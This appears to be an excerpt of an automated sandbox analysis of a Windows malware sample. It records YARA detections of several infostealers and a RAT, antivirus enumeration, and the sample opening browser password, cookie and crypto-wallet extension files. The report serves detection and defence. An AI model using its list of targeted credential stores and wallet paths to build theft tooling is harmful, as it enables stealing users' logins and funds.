Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\2M1NS61GG8.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 4.2.AddInProcess32.exe.3939ec0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.AddInProcess32.exe.3939ec0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.AddInProcess32.exe.3afcb18.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.AddInProcess32.exe.3ad4af8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.AddInProcess32.exe.3ad4af8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.AddInProcess32.exe.3afcb18.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.2503804828.0000000003849000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2478972783.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2503804828.0000000003A79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2503804828.00000000038EA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected RedLine Stealer

Source: Yara match	File source: 4.2.AddInProcess32.exe.3939ec0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.AddInProcess32.exe.3939ec0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.AddInProcess32.exe.3afcb18.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.AddInProcess32.exe.3ad4af8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.AddInProcess32.exe.3ad4af8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.AddInProcess32.exe.3afcb18.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.2503804828.0000000003849000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2478972783.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2503804828.0000000003A79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2503804828.00000000038EA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected zgRAT

Source: Yara match	File source: 4.2.AddInProcess32.exe.3939ec0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.AddInProcess32.exe.3939ec0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.AddInProcess32.exe.3afcb18.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.AddInProcess32.exe.3ad4af8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.AddInProcess32.exe.3ad4af8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.AddInProcess32.exe.3afcb18.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE

Found many strings related to Crypto-Wallets (likely being stolen)

Source: AddInProcess32.exe, 00000008.00000002.2498007739.00000000007E7000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: AWallets/ElectrumAO
Source: AddInProcess32.exe, 00000008.00000002.2498007739.00000000007E7000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: AWallets/JAXX New VersionA
Source: AddInProcess32.exe, 00000008.00000002.2498007739.00000000007E7000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: Awindow-state.json
Source: AddInProcess32.exe, 00000008.00000002.2498007739.00000000007E7000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: AWallets/ExodusAC:\Users\user\AppData\Roaming\Exodus\exodus.wallet4Z
Source: AddInProcess32.exe, 00000008.00000002.2498007739.00000000007E7000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: AWallets/ExodusAC:\Users\user\AppData\Roaming\Exodus\exodus.wallet4Z
Source: AddInProcess32.exe, 00000008.00000002.2498007739.00000000007E7000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: Aapp-store.jsonAWallets/BinanceC:\Users\user\AppData\Roaming\BinanceA%appdata%\Binance
Source: AddInProcess32.exe, 00000008.00000002.2498007739.00000000007E7000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: AWallets/EthereumAo
Source: AddInProcess32.exe, 00000008.00000002.2498007739.00000000007E7000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: AWallets/CoinomiC:\Users\user\AppData\Local\Coinomi\Coinomi\walletsZ
Source: AddInProcess32.exe, 00000004.00000002.2503804828.0000000003849000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: set_UseMachineKeyStore
Source: AddInProcess32.exe, 00000008.00000002.2498007739.00000000007E7000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: AC:\Users\user\AppData\Roaming\Ledger Live+Z

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
